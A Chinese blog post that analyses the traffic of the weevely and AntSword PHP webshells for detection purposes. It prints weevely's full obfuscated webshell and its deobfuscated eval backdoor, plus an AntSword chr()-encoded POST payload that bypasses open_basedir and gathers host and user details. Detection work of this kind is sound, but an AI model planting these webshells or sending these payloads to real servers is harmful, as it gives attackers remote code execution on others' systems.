木马流量分析


weevely、蚁剑

weevely

环境: 4.0.1

生成

weevely generate <password> <filename>

流量分析

之前看到很多分析文章说通过Referer传参, 然而现在早就不是了

目前的流量Weevely Webshell入侵检测之小试牛刀说的一样, 确实很难看出痕迹

目前只有在流量很短的时候可以确定一些特征

流量包中的POST请求Content-Length长度固定为83位

回包的Content-Length长度为60

回包的内容是45位的base64编码的加密数据和12位的数字串

1.png

然而长数据的时候几乎看不出任何特征

2.png

入侵检测——weevely这篇文章提到, 连接木马没有数据

我操作之后发现确实是这样的, 甚至不完全称得上的连接木马, 他根本就不会发包, 随便写个url和密码都能进入环境

检测

上马后

目前在已经被上马之后, 很难检测到, 几乎没有共同的特征

除了上文提到的短流量特征和收发数据都被base64加密

主要的检测还是在上马之前

上马前

明文特征:

  • <?php
  • str_replace(“…”);
  • ?>
<?php
$X='$jG++,$i++){$o.=$Gt{$iG}^$k{G$j};}}rGeturn $Go;}ifG (G@preg_mat';
$E='Gse64_encodGe(@x(@gzcGomprGGess($o),$k));priGnt("$GGp$kh$r$kf");}';
$D='$k="a675GGe634";$Gkh="5282dcGeffb96"G;G$kf=G"f1aacc14Gdd8cG";$p';
$a='e($Gm[1]),$k)G));$oG=@Gob_get_conteGntsG();G@ob_end_cleanG();G$r=@bGa';
$j='="zGGM0zH14OjoSmAsOe";GfunctiGon x($Gt,$Gk){G$c=strlen(G$k);G$l=str';
$O='lGeGn($t);$o="";foGr($iG=0;$i<$Gl;G){foGr($j=0;($j<$c&G&$Gi<G$l);';
$N=str_replace('v','','cvrveate_vfuvvvnction');
$V='GG)==1) {@ob_starGt();@GeGval(@gzGuncomGpress(@x(@GbasGeG64_decod';
$m='Gch("/G$khG(.+)$kf/",@fiGle_geGt_coGnGtents("pGhp://inpGut"),$m';
$R=str_replace('G','',$D.$j.$O.$X.$m.$V.$a.$E);

// var_dump($R);
$z=$N('',$R);
$z();
?>

这是做了混淆的木马源码, 其实混淆做的很简单

就是通过加随机字符串规避检查, 然后通过str_replace()恢复

再创建匿名函数

直接var_dump($R)并格式化后得到以下代码

<?php
$k="a675e634";
$kh="5282dceffb96";
$kf="f1aacc14dd8c";
$p="zM0zH14OjoSmAsOe";
function x($t,$k) {
    $c=strlen($k);
    $l=strlen($t);
    $o="";
    for ($i=0;$i<$l;) {
        for ($j=0;($j<$c&&$i<$l);$j++,$i++) {
            $o.=$t { $i } ^$k { $j } ;
        }
    }
    return $o;
}
if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {
    @ob_start();
    @eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
    $o=@ob_get_contents();
    @ob_end_clean();
    $r=@base64_encode(@x(@gzcompress($o),$k));
    print("$p$kh$r$kf");
}

首先通过file_get_contents("php://input")读取数据

然后preg_match()匹配并赋值给$m

然后清除缓冲区

然后将$m[1]即匹配到的第一个字符串base64解密, 然后用私钥$k解密再gzuncompress()解压缩

并执行, 然后发送.发送的过程和接受差不多

蚁剑

3.png

默认发送的流量特征就很明显了, 可以用python post模拟传参

#!/usr/bin/python
# import requests
# url = "http://127.0.0.1/P/ant.php"
# data = {'ant':'@eVAl(cHr(64).ChR(105).ChR(110).ChR(105).ChR(95).ChR(115).ChR(101).ChR(116).ChR(40).ChR(34).ChR(100).ChR(105).ChR(115).ChR(112).ChR(108).ChR(97).ChR(121).ChR(95).ChR(101).ChR(114).ChR(114).ChR(111).ChR(114).ChR(115).ChR(34).ChR(44).ChR(32).ChR(34).ChR(48).ChR(34).ChR(41).ChR(59).ChR(64).ChR(115).ChR(101).ChR(116).ChR(95).ChR(116).ChR(105).ChR(109).ChR(101).ChR(95).ChR(108).ChR(105).ChR(109).ChR(105).ChR(116).ChR(40).ChR(48).ChR(41).ChR(59).ChR(36).ChR(111).ChR(112).ChR(100).ChR(105).ChR(114).ChR(61).ChR(64).ChR(105).ChR(110).ChR(105).ChR(95).ChR(103).ChR(101).ChR(116).ChR(40).ChR(34).ChR(111).ChR(112).ChR(101).ChR(110).ChR(95).ChR(98).ChR(97).ChR(115).ChR(101).ChR(100).ChR(105).ChR(114).ChR(34).ChR(41).ChR(59).ChR(105).ChR(102).ChR(40).ChR(36).ChR(111).ChR(112).ChR(100).ChR(105).ChR(114).ChR(41).ChR(32).ChR(123).ChR(36).ChR(111).ChR(99).ChR(119).ChR(100).ChR(61).ChR(100).ChR(105).ChR(114).ChR(110).ChR(97).ChR(109).ChR(101).ChR(40).ChR(36).ChR(95).ChR(83).ChR(69).ChR(82).ChR(86).ChR(69).ChR(82).ChR(91).ChR(34).ChR(83).ChR(67).ChR(82).ChR(73).ChR(80).ChR(84).ChR(95).ChR(70).ChR(73).ChR(76).ChR(69).ChR(78).ChR(65).ChR(77).ChR(69).ChR(34).ChR(93).ChR(41).ChR(59).ChR(36).ChR(111).ChR(112).ChR(97).ChR(114).ChR(114).ChR(61).ChR(112).ChR(114).ChR(101).ChR(103).ChR(95).ChR(115).ChR(112).ChR(108).ChR(105).ChR(116).ChR(40).ChR(34).ChR(47).ChR(59).ChR(124).ChR(58).ChR(47).ChR(34).ChR(44).ChR(36).ChR(111).ChR(112).ChR(100).ChR(105).ChR(114).ChR(41).ChR(59).ChR(64).ChR(97).ChR(114).ChR(114).ChR(97).ChR(121).ChR(95).ChR(112).ChR(117).ChR(115).ChR(104).ChR(40).ChR(36).ChR(111).ChR(112).ChR(97).ChR(114).ChR(114).ChR(44).ChR(36).ChR(111).ChR(99).ChR(119).ChR(100).ChR(44).ChR(115).ChR(121).ChR(115).ChR(95).ChR(103).ChR(101).ChR(116).ChR(95).ChR(116).ChR(101).ChR(109).ChR(112).ChR(95).ChR(100).ChR(105).ChR(114).ChR(40).ChR(41).ChR(41).ChR(59).ChR(102).ChR(111).ChR(114).ChR(101).ChR(97).ChR(99).ChR(104).ChR(40).ChR(36).ChR(111).ChR(112).ChR(97).ChR(114).ChR(114).ChR(32).ChR(97).ChR(115).ChR(32).ChR(36).ChR(105).ChR(116).ChR(101).ChR(109).ChR(41).ChR(32).ChR(123).ChR(105).ChR(102).ChR(40).ChR(33).ChR(64).ChR(105).ChR(115).ChR(95).ChR(119).ChR(114).ChR(105).ChR(116).ChR(97).ChR(98).ChR(108).ChR(101).ChR(40).ChR(36).ChR(105).ChR(116).ChR(101).ChR(109).ChR(41).ChR(41).ChR(123).ChR(99).ChR(111).ChR(110).ChR(116).ChR(105).ChR(110).ChR(117).ChR(101).ChR(59).ChR(125).ChR(59).ChR(36).ChR(116).ChR(109).ChR(100).ChR(105).ChR(114).ChR(61).ChR(36).ChR(105).ChR(116).ChR(101).ChR(109).ChR(46).ChR(34).ChR(47).ChR(46).ChR(99).ChR(56).ChR(56).ChR(97).ChR(99).ChR(51).ChR(54).ChR(49).ChR(34).ChR(59).ChR(64).ChR(109).ChR(107).ChR(100).ChR(105).ChR(114).ChR(40).ChR(36).ChR(116).ChR(109).ChR(100).ChR(105).ChR(114).ChR(41).ChR(59).ChR(105).ChR(102).ChR(40).ChR(33).ChR(64).ChR(102).ChR(105).ChR(108).ChR(101).ChR(95).ChR(101).ChR(120).ChR(105).ChR(115).ChR(116).ChR(115).ChR(40).ChR(36).ChR(116).ChR(109).ChR(100).ChR(105).ChR(114).ChR(41).ChR(41).ChR(123).ChR(99).ChR(111).ChR(110).ChR(116).ChR(105).ChR(110).ChR(117).ChR(101).ChR(59).ChR(125).ChR(64).ChR(99).ChR(104).ChR(100).ChR(105).ChR(114).ChR(40).ChR(36).ChR(116).ChR(109).ChR(100).ChR(105).ChR(114).ChR(41).ChR(59).ChR(64).ChR(105).ChR(110).ChR(105).ChR(95).ChR(115).ChR(101).ChR(116).ChR(40).ChR(34).ChR(111).ChR(112).ChR(101).ChR(110).ChR(95).ChR(98).ChR(97).ChR(115).ChR(101).ChR(100).ChR(105).ChR(114).ChR(34).ChR(44).ChR(32).ChR(34).ChR(46).ChR(46).ChR(34).ChR(41).ChR(59).ChR(36).ChR(99).ChR(110).ChR(116).ChR(97).ChR(114).ChR(114).ChR(61).ChR(64).ChR(112).ChR(114).ChR(101).ChR(103).ChR(95).ChR(115).ChR(112).ChR(108).ChR(105).ChR(116).ChR(40).ChR(34).ChR(47).ChR(92).ChR(92).ChR(92).ChR(92).ChR(124).ChR(92).ChR(47).ChR(47).ChR(34).ChR(44).ChR(36).ChR(116).ChR(109).ChR(100).ChR(105).ChR(114).ChR(41).ChR(59).ChR(102).ChR(111).ChR(114).ChR(40).ChR(36).ChR(105).ChR(61).ChR(48).ChR(59).ChR(36).ChR(105).ChR(60).ChR(115).ChR(105).ChR(122).ChR(101).ChR(111).ChR(102).ChR(40).ChR(36).ChR(99).ChR(110).ChR(116).ChR(97).ChR(114).ChR(114).ChR(41).ChR(59).ChR(36).ChR(105).ChR(43).ChR(43).ChR(41).ChR(123).ChR(64).ChR(99).ChR(104).ChR(100).ChR(105).ChR(114).ChR(40).ChR(34).ChR(46).ChR(46).ChR(34).ChR(41).ChR(59).ChR(125).ChR(59).ChR(64).ChR(105).ChR(110).ChR(105).ChR(95).ChR(115).ChR(101).ChR(116).ChR(40).ChR(34).ChR(111).ChR(112).ChR(101).ChR(110).ChR(95).ChR(98).ChR(97).ChR(115).ChR(101).ChR(100).ChR(105).ChR(114).ChR(34).ChR(44).ChR(34).ChR(47).ChR(34).ChR(41).ChR(59).ChR(64).ChR(114).ChR(109).ChR(100).ChR(105).ChR(114).ChR(40).ChR(36).ChR(116).ChR(109).ChR(100).ChR(105).ChR(114).ChR(41).ChR(59).ChR(98).ChR(114).ChR(101).ChR(97).ChR(107).ChR(59).ChR(125).ChR(59).ChR(125).ChR(59).ChR(59).ChR(102).ChR(117).ChR(110).ChR(99).ChR(116).ChR(105).ChR(111).ChR(110).ChR(32).ChR(97).ChR(115).ChR(101).ChR(110).ChR(99).ChR(40).ChR(36).ChR(111).ChR(117).ChR(116).ChR(41).ChR(123).ChR(114).ChR(101).ChR(116).ChR(117).ChR(114).ChR(110).ChR(32).ChR(36).ChR(111).ChR(117).ChR(116).ChR(59).ChR(125).ChR(59).ChR(102).ChR(117).ChR(110).ChR(99).ChR(116).ChR(105).ChR(111).ChR(110).ChR(32).ChR(97).ChR(115).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(40).ChR(41).ChR(123).ChR(36).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(61).ChR(111).ChR(98).ChR(95).ChR(103).ChR(101).ChR(116).ChR(95).ChR(99).ChR(111).ChR(110).ChR(116).ChR(101).ChR(110).ChR(116).ChR(115).ChR(40).ChR(41).ChR(59).ChR(111).ChR(98).ChR(95).ChR(101).ChR(110).ChR(100).ChR(95).ChR(99).ChR(108).ChR(101).ChR(97).ChR(110).ChR(40).ChR(41).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(34).ChR(102).ChR(97).ChR(100).ChR(101).ChR(54).ChR(34).ChR(46).ChR(34).ChR(102).ChR(51).ChR(56).ChR(97).ChR(52).ChR(34).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(64).ChR(97).ChR(115).ChR(101).ChR(110).ChR(99).ChR(40).ChR(36).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(41).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(34).ChR(101).ChR(49).ChR(51).ChR(34).ChR(46).ChR(34).ChR(48).ChR(98).ChR(48).ChR(53).ChR(34).ChR(59).ChR(125).ChR(111).ChR(98).ChR(95).ChR(115).ChR(116).ChR(97).ChR(114).ChR(116).ChR(40).ChR(41).ChR(59).ChR(116).ChR(114).ChR(121).ChR(123).ChR(36).ChR(68).ChR(61).ChR(100).ChR(105).ChR(114).ChR(110).ChR(97).ChR(109).ChR(101).ChR(40).ChR(36).ChR(95).ChR(83).ChR(69).ChR(82).ChR(86).ChR(69).ChR(82).ChR(91).ChR(34).ChR(83).ChR(67).ChR(82).ChR(73).ChR(80).ChR(84).ChR(95).ChR(70).ChR(73).ChR(76).ChR(69).ChR(78).ChR(65).ChR(77).ChR(69).ChR(34).ChR(93).ChR(41).ChR(59).ChR(105).ChR(102).ChR(40).ChR(36).ChR(68).ChR(61).ChR(61).ChR(34).ChR(34).ChR(41).ChR(36).ChR(68).ChR(61).ChR(100).ChR(105).ChR(114).ChR(110).ChR(97).ChR(109).ChR(101).ChR(40).ChR(36).ChR(95).ChR(83).ChR(69).ChR(82).ChR(86).ChR(69).ChR(82).ChR(91).ChR(34).ChR(80).ChR(65).ChR(84).ChR(72).ChR(95).ChR(84).ChR(82).ChR(65).ChR(78).ChR(83).ChR(76).ChR(65).ChR(84).ChR(69).ChR(68).ChR(34).ChR(93).ChR(41).ChR(59).ChR(36).ChR(82).ChR(61).ChR(34).ChR(123).ChR(36).ChR(68).ChR(125).ChR(9).ChR(34).ChR(59).ChR(105).ChR(102).ChR(40).ChR(115).ChR(117).ChR(98).ChR(115).ChR(116).ChR(114).ChR(40).ChR(36).ChR(68).ChR(44).ChR(48).ChR(44).ChR(49).ChR(41).ChR(33).ChR(61).ChR(34).ChR(47).ChR(34).ChR(41).ChR(123).ChR(102).ChR(111).ChR(114).ChR(101).ChR(97).ChR(99).ChR(104).ChR(40).ChR(114).ChR(97).ChR(110).ChR(103).ChR(101).ChR(40).ChR(34).ChR(67).ChR(34).ChR(44).ChR(34).ChR(90).ChR(34).ChR(41).ChR(97).ChR(115).ChR(32).ChR(36).ChR(76).ChR(41).ChR(105).ChR(102).ChR(40).ChR(105).ChR(115).ChR(95).ChR(100).ChR(105).ChR(114).ChR(40).ChR(34).ChR(123).ChR(36).ChR(76).ChR(125).ChR(58).ChR(34).ChR(41).ChR(41).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(123).ChR(36).ChR(76).ChR(125).ChR(58).ChR(34).ChR(59).ChR(125).ChR(101).ChR(108).ChR(115).ChR(101).ChR(123).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(47).ChR(34).ChR(59).ChR(125).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(9).ChR(34).ChR(59).ChR(36).ChR(117).ChR(61).ChR(40).ChR(102).ChR(117).ChR(110).ChR(99).ChR(116).ChR(105).ChR(111).ChR(110).ChR(95).ChR(101).ChR(120).ChR(105).ChR(115).ChR(116).ChR(115).ChR(40).ChR(34).ChR(112).ChR(111).ChR(115).ChR(105).ChR(120).ChR(95).ChR(103).ChR(101).ChR(116).ChR(101).ChR(103).ChR(105).ChR(100).ChR(34).ChR(41).ChR(41).ChR(63).ChR(64).ChR(112).ChR(111).ChR(115).ChR(105).ChR(120).ChR(95).ChR(103).ChR(101).ChR(116).ChR(112).ChR(119).ChR(117).ChR(105).ChR(100).ChR(40).ChR(64).ChR(112).ChR(111).ChR(115).ChR(105).ChR(120).ChR(95).ChR(103).ChR(101).ChR(116).ChR(101).ChR(117).ChR(105).ChR(100).ChR(40).ChR(41).ChR(41).ChR(58).ChR(34).ChR(34).ChR(59).ChR(36).ChR(115).ChR(61).ChR(40).ChR(36).ChR(117).ChR(41).ChR(63).ChR(36).ChR(117).ChR(91).ChR(34).ChR(110).ChR(97).ChR(109).ChR(101).ChR(34).ChR(93).ChR(58).ChR(64).ChR(103).ChR(101).ChR(116).ChR(95).ChR(99).ChR(117).ChR(114).ChR(114).ChR(101).ChR(110).ChR(116).ChR(95).ChR(117).ChR(115).ChR(101).ChR(114).ChR(40).ChR(41).ChR(59).ChR(36).ChR(82).ChR(46).ChR(61).ChR(112).ChR(104).ChR(112).ChR(95).ChR(117).ChR(110).ChR(97).ChR(109).ChR(101).ChR(40).ChR(41).ChR(59).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(9).ChR(123).ChR(36).ChR(115).ChR(125).ChR(34).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(36).ChR(82).ChR(59).ChR(59).ChR(125).ChR(99).ChR(97).ChR(116).ChR(99).ChR(104).ChR(40).ChR(69).ChR(120).ChR(99).ChR(101).ChR(112).ChR(116).ChR(105).ChR(111).ChR(110).ChR(32).ChR(36).ChR(101).ChR(41).ChR(123).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(34).ChR(69).ChR(82).ChR(82).ChR(79).ChR(82).ChR(58).ChR(47).ChR(47).ChR(34).ChR(46).ChR(36).ChR(101).ChR(45).ChR(62).ChR(103).ChR(101).ChR(116).ChR(77).ChR(101).ChR(115).ChR(115).ChR(97).ChR(103).ChR(101).ChR(40).ChR(41).ChR(59).ChR(125).ChR(59).ChR(97).ChR(115).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(40).ChR(41).ChR(59).ChR(100).ChR(105).ChR(101).ChR(40).ChR(41).ChR(59));'}
# r = requests.post(url,data)
data = [64,105,110,105,95,115,101,116,40,34,100,105,115,112,108,97,121,95,101,114,114,111,114,115,34,44,32,34,48,34,41,59,64,115,101,116,95,116,105,109,101,95,108,105,109,105,116,40,48,41,59,36,111,112,100,105,114,61,64,105,110,105,95,103,101,116,40,34,111,112,101,110,95,98,97,115,101,100,105,114,34,41,59,105,102,40,36,111,112,100,105,114,41,32,123,36,111,99,119,100,61,100,105,114,110,97,109,101,40,36,95,83,69,82,86,69,82,91,34,83,67,82,73,80,84,95,70,73,76,69,78,65,77,69,34,93,41,59,36,111,112,97,114,114,61,112,114,101,103,95,115,112,108,105,116,40,34,47,59,124,58,47,34,44,36,111,112,100,105,114,41,59,64,97,114,114,97,121,95,112,117,115,104,40,36,111,112,97,114,114,44,36,111,99,119,100,44,115,121,115,95,103,101,116,95,116,101,109,112,95,100,105,114,40,41,41,59,102,111,114,101,97,99,104,40,36,111,112,97,114,114,32,97,115,32,36,105,116,101,109,41,32,123,105,102,40,33,64,105,115,95,119,114,105,116,97,98,108,101,40,36,105,116,101,109,41,41,123,99,111,110,116,105,110,117,101,59,125,59,36,116,109,100,105,114,61,36,105,116,101,109,46,34,47,46,99,56,56,97,99,51,54,49,34,59,64,109,107,100,105,114,40,36,116,109,100,105,114,41,59,105,102,40,33,64,102,105,108,101,95,101,120,105,115,116,115,40,36,116,109,100,105,114,41,41,123,99,111,110,116,105,110,117,101,59,125,64,99,104,100,105,114,40,36,116,109,100,105,114,41,59,64,105,110,105,95,115,101,116,40,34,111,112,101,110,95,98,97,115,101,100,105,114,34,44,32,34,46,46,34,41,59,36,99,110,116,97,114,114,61,64,112,114,101,103,95,115,112,108,105,116,40,34,47,92,92,92,92,124,92,47,47,34,44,36,116,109,100,105,114,41,59,102,111,114,40,36,105,61,48,59,36,105,60,115,105,122,101,111,102,40,36,99,110,116,97,114,114,41,59,36,105,43,43,41,123,64,99,104,100,105,114,40,34,46,46,34,41,59,125,59,64,105,110,105,95,115,101,116,40,34,111,112,101,110,95,98,97,115,101,100,105,114,34,44,34,47,34,41,59,64,114,109,100,105,114,40,36,116,109,100,105,114,41,59,98,114,101,97,107,59,125,59,125,59,59,102,117,110,99,116,105,111,110,32,97,115,101,110,99,40,36,111,117,116,41,123,114,101,116,117,114,110,32,36,111,117,116,59,125,59,102,117,110,99,116,105,111,110,32,97,115,111,117,116,112,117,116,40,41,123,36,111,117,116,112,117,116,61,111,98,95,103,101,116,95,99,111,110,116,101,110,116,115,40,41,59,111,98,95,101,110,100,95,99,108,101,97,110,40,41,59,101,99,104,111,32,34,102,97,100,101,54,34,46,34,102,51,56,97,52,34,59,101,99,104,111,32,64,97,115,101,110,99,40,36,111,117,116,112,117,116,41,59,101,99,104,111,32,34,101,49,51,34,46,34,48,98,48,53,34,59,125,111,98,95,115,116,97,114,116,40,41,59,116,114,121,123,36,68,61,100,105,114,110,97,109,101,40,36,95,83,69,82,86,69,82,91,34,83,67,82,73,80,84,95,70,73,76,69,78,65,77,69,34,93,41,59,105,102,40,36,68,61,61,34,34,41,36,68,61,100,105,114,110,97,109,101,40,36,95,83,69,82,86,69,82,91,34,80,65,84,72,95,84,82,65,78,83,76,65,84,69,68,34,93,41,59,36,82,61,34,123,36,68,125,9,34,59,105,102,40,115,117,98,115,116,114,40,36,68,44,48,44,49,41,33,61,34,47,34,41,123,102,111,114,101,97,99,104,40,114,97,110,103,101,40,34,67,34,44,34,90,34,41,97,115,32,36,76,41,105,102,40,105,115,95,100,105,114,40,34,123,36,76,125,58,34,41,41,36,82,46,61,34,123,36,76,125,58,34,59,125,101,108,115,101,123,36,82,46,61,34,47,34,59,125,36,82,46,61,34,9,34,59,36,117,61,40,102,117,110,99,116,105,111,110,95,101,120,105,115,116,115,40,34,112,111,115,105,120,95,103,101,116,101,103,105,100,34,41,41,63,64,112,111,115,105,120,95,103,101,116,112,119,117,105,100,40,64,112,111,115,105,120,95,103,101,116,101,117,105,100,40,41,41,58,34,34,59,36,115,61,40,36,117,41,63,36,117,91,34,110,97,109,101,34,93,58,64,103,101,116,95,99,117,114,114,101,110,116,95,117,115,101,114,40,41,59,36,82,46,61,112,104,112,95,117,110,97,109,101,40,41,59,36,82,46,61,34,9,123,36,115,125,34,59,101,99,104,111,32,36,82,59,59,125,99,97,116,99,104,40,69,120,99,101,112,116,105,111,110,32,36,101,41,123,101,99,104,111,32,34,69,82,82,79,82,58,47,47,34,46,36,101,45,62,103,101,116,77,101,115,115,97,103,101,40,41,59,125,59,97,115,111,117,116,112,117,116,40,41,59,100,105,101,40,41,59]

for i in data:
    print(chr(i),end = "")
print()

传参内容如下

@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split("/;|:/",$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.c88ac361";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "fade6"."f38a4";echo @asenc($output);echo "e13"."0b05";}ob_start();try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}    ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.="    ";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="    {$s}";echo $R;;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();

  TOC